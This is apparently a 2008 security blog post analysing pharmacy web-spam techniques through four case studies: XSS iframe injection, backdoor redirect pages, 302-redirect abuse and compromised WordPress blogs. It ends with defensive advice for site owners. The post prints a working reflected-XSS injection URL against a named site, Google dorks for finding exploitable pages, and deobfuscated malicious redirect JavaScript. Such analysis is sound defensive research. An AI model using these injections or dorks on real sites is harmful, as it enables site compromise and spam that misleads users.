April 30, 2008

Web Spam Techniques

Table of contents
Web Spam Introduction
Black Hat SEO / White Hat SEO
Web Spam Business
Aggressive Black Hat SEO
Web Spam – The online pharmacy industry
Web Spam – Affiliate/Associate programs
Web Spam – Keywords and how to recognise spam links

Web Spam Case Studies – Techniques Exposed

1st Case: XSS + IFRAME
2nd Case: JavaScript Redirection + Backdoor page
3rd Case: 302 Redirection + Scraped site
4th Case: The Splog

Security Considerations
Security Recommendations

Web Spam Introduction

Web Spam Definition: The practice of manipulating web pages in order to cause search engines to rank some web pages higher than they would without any manipulation.

Spammers manipulate search engines results in order to target users. Motive can be commercial, political and/or religious.

Black Hat SEO and White Hat SEO techniques

There are different techniques to manipulate search engine page results (SERP):

White-Hat SEO: all web marketing techniques adhering to web master guidelines of major search engines.

Black-Hat SEO: all techniques that do not follow any guidelines. Some of them are considered illegal.

There are two main reasons for manipulating results:

Users trust search engines as a means of finding information. As a consequence, web spammers exploit this trust.

The second reason is that users usually do not look past the first ten results returned by the search engine in most cases. This is why White/Black Hat SEO techniques are used.

The Web Spam Business

The top-10 results page is a target for many companies and represents the SEO business. Some SEO businesses/individuals employ both white hat and black hat SEO to increase visibility/positioning of their clients. In these cases, Black hat SEO is applied with moderation and without leaving any footprint. This is approach is taken in order to not expose the techniques used. If these techniques are compromised, web spammers need to find new techniques. SEO companies using spamming techniques can also be reported by users or even by their clients.

Web Spam - Aggressive Black Hat SEO

On the opposite, there are instances where black hat SEO is used aggressively. This is the case of affiliate/associate programs web spam. This article will specifically focus on these cases because some of these techniques are directly exploiting common web application vulnerabilities. As consequences, web spamming needs to be treated as a threat.

Web Spam - The online pharmacy industry

Let’s focus on a very popular marketplace: online pharmaceuticals. Consider the following statistics for the online pharmacy keywords:

Google:


Yahoo:


Live:


Not always these numbers are real - they are an approssimative figure of the real results.
Businesses on the first search engine result page (SERP) for that keywords need to:

  • Always have a strong visibility/positioning
  • Rank better than competitors
Web Spam - Affiliate/Associate Programs

Businesses in these industries prefer to not spam directly considering the anti-spam laws in US and European countries (Can Spam Act 2003, Directive 2002/58/EC). Furthermore, these companies cannot compromise their search engine positioning.

This is one of the reasons why affiliate/associate program exist. These programs typically provide:

  • Sale increase – supported by attractive earning schemes, advanced tools to manage account with statistics and good reputation (regular payment).
  • Limited Liability - the affiliate is used as an escape goat in case of spam allegations.
Some affiliate/associate programs indirectly allow spam. How that is possible?

  • Some of these affiliate/associate programs do not include terms of agreement at the sign-up page.
  • Some of these companies operate in jurisdiction where spam allegations are not enforceable.
  • In other cases, anti-spam policy in affiliate/associate programs are typically referring to email spam only.
Case of registration form without terms of agreement:



Case of "exotic" jurisdiction:



Spam = Email Spam



Affiliates use aggressive black hat SEO to spam merchant products. In this way, they have more chances to increase revenues. In most cases, there is no real law enforcement considering the lack of terms of agreements, the spam definition restricted to email spam only. Also, the affiliate id is not verified and the companies generally do not bother (except for statistical reasons) where the "click" came from. Basically, it is "legally" convenient for both sides (companies and affiliates) to carry on their business in such way. In the online pharmacy industry, web spammers target specific products such as viagra, cialis, phentermine.

Web Spam - Online pharmacy keywords

Results related to 23rd April 2008:
Keywords
Google
Yahoo
Live
Spam Links
buy viagra online 11200000 44600000 57400000 G:4/10
Y:6/10
L:10/10
cheap viagra 12100100 36700000 53100000 G:7/10
Y:7/10
L:9/10
buy cialis online 7810000 33400000 25000000 G:8/10
Y:9/10
L:10/10
buy phentermine online 4340000 27000000 52600000 G:8/10
Y:8/10
L:10/10

The last column on the right indicates the number of spam links returned in the top 10 results page for the relative search engines.

Web Spam - Recognising web spam links

Potential signs of web spam in SERPS:

  • Domain name not pertinent/not associable to the keyword
  • URL composed by more than one level (long URL) + spam keyword in the result
  • URL including specific pages using parameters such as Id, U, Articleid, etc + spam keyword in the result
  • Domain suffix: gov, edu, org, info, name, net + spam keyword in the result
  • Keywords stuffing – spam keyword in title, description and URL

Some examples:







Web Spam Techniques - Case Studies

Let’s go through 4 different web spam cases. This will allow us to better understand the most recent web spam techniques:

1st Case: XSS + IFRAME
2nd Case: JavaScript Redirection + Backdoor page
3rd Case: 302 Redirection + Scraped site
4th Case: Splog

Note that these techniques only refer to the period between the 13th and the 26th April 2008. New web spam techniques are introduced every 2-3 days.

Web Spam Techniques - Case Study I

XSS + IFRAME Google Dork: spam keywords inurl:iframe and inurl:src Spam Link: http://thehipp.org/search.php?www=w&query=
buy%20cialis%20generic%20%3ciframe%20src=//isobmd.com/cgi-bin/sc.pl?156-1207055546

Ranked in top 10 results page for keywords: buy cialis generic

Spam Link: http://thehipp.org/search.php?www=w&query=
buy%20cialis%20generic%20%3ciframe%20src=//isobmd.com/cgi-bin/sc.pl?156-1207055546

Site exploited: thehipp.org

Spammed keyword: buy cialis generic

Vulnerable variable: query

Reflected XSS Injection: %3ciframe%20src Injection

Target Site: isobmd.com

SEO Analysis: thehipp.org

PR: 5 I: 1,780 L: 88 Cached: 29 Apr 2008 I: 1,880 L: 441 LD: 19,256 I: 8100 L: 3 Rank: 836238 Age: Aug 2003

Site Backlinks: 79 entries

Backlinks are links which support the promotion of the spam link. These are usually part of the spam link farm. To find backlinks, the keyword is the full URL of the spam link

This site has been chosen because:

Good PageRank (PR)
Vulnerable to cross site scripting

Let’s now see what really happens:

This is the first GET request: (host: thehipp.org) GET /search.php?www=w&query=buy%20cialis%20generic%20%3c
iframe%20src=//isobmd.com/cgi-bin/sc.pl?156-1207055546

The response is 200 OK. HTML is returned and includes IFRAME injection. This causes the browser to perform another GET request.

The second GET request: (host: isobdm.com) GET /cgi-bin/sc.pl?156-1207055546'</span

The response is 200 ok. HTML is returned and only contains an obfuscated JavaScript. The obfuscated JavaScript makes use of eval and unescape with a payload of URL characters.

Obfuscated JavaScript is commonly used to hide redirection to the search engine spiders. This JavaScript manipulates the DOM to retrieve the referer and the keyword from the URL. It then uses these values in another redirection.

So the third GET request: (host: www.finance-leaders.com) GET /feed3.php?keyword=156&feed=8&ref=http%3A//thehipp.org/
search.php%3Fwww%3Dw%26query%3Dbuy%2520cialis%2520
generic%2520%253ciframe%2520src%3D//isobmd.com/cgi-bin/sc.pl%3F156-1207055546

The response is 200 OK. HTML is returned with a JavaScript using top.location.href to redirect to the spam site.

So the fourth GET request: (host: genericpillsworld.com) GET /product/61/

The response is 200 OK. HTML is returned with the content of the site and the following persistent cookie is set:

Set-Cookie: aff=552; Domain=.genericpillsworld.com; Expires=Wed, 30-Apr-2008 10:20:23 GMT; Path=/

So every purchase made at the site will be associated with the affiliate account 552.

Web Spam Techniques - Case Study II

JavaScript Redirection + Backdoor page

Russian backdoor Google Dork: "online supportchart" "Name *:" "Comment *:" "All right reserved.“

Spam Link: www.daemen.edu/academics/festival/management2007/downloads
/thumbs/?item=678

Rank 1st in top 10 results page for keywords: official shop cialis

Site exploited: daemen.edu
Spammed keyword: official shop cialis
Spam hook: ?item

SEO Analysis: daemen.edu

PR: 6 I: 6,880 L: 312 Cached: 27 Apr 2008 I: 8,710 L: 25 LD: 7,758 I: 18700 L: 0 Rank: 370332 Age: Nov 02, 1996

Site Backlinks: 155 entries

Backlinks Google Dork: www.daemen.edu/academics/festival/management2007/downloads
/thumbs/?item=

This site has been chosen because:

Good PageRank (PR)
.EDU is a trusted domain suffix

Let’s now see what really happens:
This is the first GET request: (host: www.daemen.edu) GET /academics/festival/management2007/downloads/thumbs/
?item=678

The response is 200 OK. An HTML page is returned. This is the backdoor page. This contains a JavaScript which is used for the redirection and a web page with some content.

The web page contains some text like the following. This is rendered if JavaScript is disabled.

Extract: “you is find hearing medical device cialis floaters AmbienCalled shape dosage Stetes the by& controversial this Dickism one a deciding on cialis floaters you cialis floaters risks semi naked news about must and of celebrities.”

This is an example of language mutation with Markov chain filter applied. This is used to get the page indexed by the search engines and to properly distribute the keyword into the page. This avoids the ban of the search engines in case of keyword stuffing.

The JavaScript is hosted on the site itself. Web spammers approach students as they can be easily corrupted to host spam scripts. In this case, the JavaScript makes use of an array, str.lenght and String.fromCharCode to generate the redirection.

Str is used as array for multiple numeric values:

for (i=0; i<str.length; i++){ gg=str[i]-364; temp=temp+String.fromCharCode(gg); } eval(temp);

temp becomes: window.location='http://mafna.info/tds/in.cgi?30&parameter=' + query + ''

So the second GET request: (host: mafna.info) GET /tds/in.cgi?30&parameter=cialis+floaters

The response is a 302 Temporary redirection to the spam site.

The third GET request: (host: www.official-medicines.org) GET /item/bestsellers/cialis.html

The response is 200 OK. HTML is returned with the content of the pharmacy site.

Web Spam Techniques - Case Study III

302 Redirection + Scraped site

Google Dork: blogtalkradio.com/buy_viagra any Google Dork redirection + spam keyword

Spam Link: http://www.blogtalkradio.com/buy_viagra

Ranked 1st in top 10 results page for keywords: buy viagra

Spam Link: http://www.blogtalkradio.com/buy_viagra

Site exploited: blogtalkradio.com

Spammed keyword: buy viagra

Spam hook: buy_viagra

SEO Analysis: blogtalkradio.com

PR: 6 I: 607,000 L: 4,000 Cached: 29 Apr 2008 I: 165,000 L: 0 LD: 1,035,462 I: 444000 L: 0 Rank: 9102 Age: Nov 1996

Site Backlinks: 27100 entries

Backlinks Google Dork: blogtalkradio.com/buy_viagra

This site has been chosen because:

Good PageRank (PR)
It allows creation of account with personal page
The web app performs a 302 temporary redirection before loading the Account personal page.

Let’s now see what really happens: This is the first GET request: (host: www.blogtalkradio.com) GET /buy_viagra The response is 302 Moved. The location header then points to:

/CommonControls/GetTimeZone.aspx?redirect=%2fbuy_viagra

The second GET request: GET /CommonControls/GetTimeZone.aspx?redirect=%2fbuy_viagra

Let’s come back to our response. It’s a 200 OK. HTML is returned containing the account profile page. User are allowed to put pictures. That’s the picture put by the user buy_viagra:



The image link points to: http://vip-side.com/in.cgi?16&parametr=Viagra

So GET request to the above URL The response is a 302 temporary redirection to: http://pharma.topfindit.org/search.php?q=Viagraq&aff=16205
&saff=0

This site is defined as scraped content site. This means that this site is automatically generated for the keyword passed through the ‘q’ parameter. It pulls then content from third party resources. In this case, curl php would be used.



Red: Keyword used to generate content of the site
Orange: Content generated automatically and containing links to spam sites. This page pretends to be a search engine. The URL reported in the site are fake.

Clicking on the first link:

GET /click.php?u=LONG BASE64 String

The base64 decoded string contains: http://208.122.40.114/klik.php?data=LONG encoded string

The response is then 302 temporary redirection to the above URL. Then follows another redirection to: http://208.122.40.114/klik.php?data=LONG encoded string

Other 2 redirections from the same host and page klik.php but with different encoded string.

And finally we land here: http://www.tabletslist.com/?product=viagra

The response is 200 OK. HTML of the pharmacy site is returned and a GET request is used to track down the affiliate and the referer:

GET /cmd/rx-partners?ps_t=1209040477625&ps_l=
http%3A//www.tabletslist.com/%3Fproduct%3Dviagra&ps_r=
http%3A//pharma.topfindit.org/search.php%3Fq%3DViagra
&ps_s=6wST1P1OHspM

Web Spam Techniques - Case Study IV

The Splog (Blog Spam = Splog)

Google Dorks:

inurl:certified + spam keyword
inurl:discount + spam keyword
inurl:google-approved + spam keyword
inurl:fda-approved + spam keyword

Spam Link: www.prospect-magazine.co.uk/?certified=307

Rank 2nd in top 10 results page for keywords: buy from certified pharmacy

SEO Analysis: prospect-magazine.co.uk

PR: 6 I: 15,000 L: 3,390 Cached: 27 Apr 2008 I: 19,600 L: 22,290 LD: 117,865 I: 166000 L: 3 Rank: 165573 Age: Apr 14, 1997

Site Backlinks: 5580 entries

Backlinks Google Dork: www.prospect-magazine.co.uk/?certified=

This site has been chosen because:

Good PageRank (PR)
It uses a vulnerable version of WordPress blog

Let’s now see what really happens:

This is the first GET request: (host: prospect-magazine.co.uk) GET /?certified=307

The response is 302 temporary redirection.

The location redirection points to: http:// sevensearch.net/delta/search.php?q =buy+from+certified

But how this is possible?

The main page of the site contains a JavaScript which checks the URL for the existence of the following variables:

Certified
Discount
Fda-approved

The JavaScript also checks if the referer is from SERPS. If JavaScript is not enabled or any of these conditions are not satisfied, then the user will be returned with the main page of the site.

This is an extract of the JavaScript on the main page.

document.URL.indexOf("?certified=")!=-1 || document.URL.indexOf("?discount=")!=-1 || document.URL.indexOf("?fda-approved=")!=-1) && ((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1)){window.location="http://sevensearch.net/delta/search.php?
q="+r.substring(q+2+t.length).split("&")[0];}</script>

Back to our redirection - so the second GET request follows: (host: sevensearch.net)
GET /pharma/search.php?q=buy+from+certified

The response is 200 OK. The HTML is returned with a scraped content site. From here, the scenario is similar to the previous case study. The link then redirects to an online pharmacy site with another GET request that tracks the affiliate.

Another variant of this web spam exploited WordPress with a vulnerable XML-RPC.php (v2.3.3). This allowed the spammer to edit posts of other users on the blog. Some victims of this technique:

www.pixelpost.org/?certified=100 http://paulocoelhoblog.com/?pharma-certified=55 www.vermario.com/blog/?google-approved=3619

By comparing the actual page and the cached one, it is possible to understand the attack. The cached page is full of generated text, users comments and links to the sevensearch.net scraped content site.

Security Considerations

Web application vulnerabilities can be used for other purposes as well: SPAM for instance!

Cross Site Scripting, 302 redirection and web app vulnerabilities in famous blog software can be used for this purpose.

Therefore our risk perception needs to include threats related to web spamming as well. In simple words: if your site has a good PR and it is vulnerable, it becomes a potential candidate for web spamming.

Security Recommendations

Beside the standard security recommendations for any web application, it is suggested the following:

Subscribe site to Google Webmaster Tool and Yahoo Site Explorer and periodically check incoming and outcoming links.

Set Google Alert on the site – this will notify if there are any changes related to the site on the SERPS.

Check/monitor web server logs constantly

Disable 302 temporary redirection if used

Periodically check web server directory and source code of the web application for any presence of backdoor.

Disclaimer

All SEO results and statistics have been taken during the following days: 13 to 26 April 2008. All techniques reported in this presentation only refer to the above timeframe. I am not responsible for any of the data disclosed in this presentation. All information used for this presentation is publicly available and can only be used for educational purposes.

Share - permalink - Comment/Contact me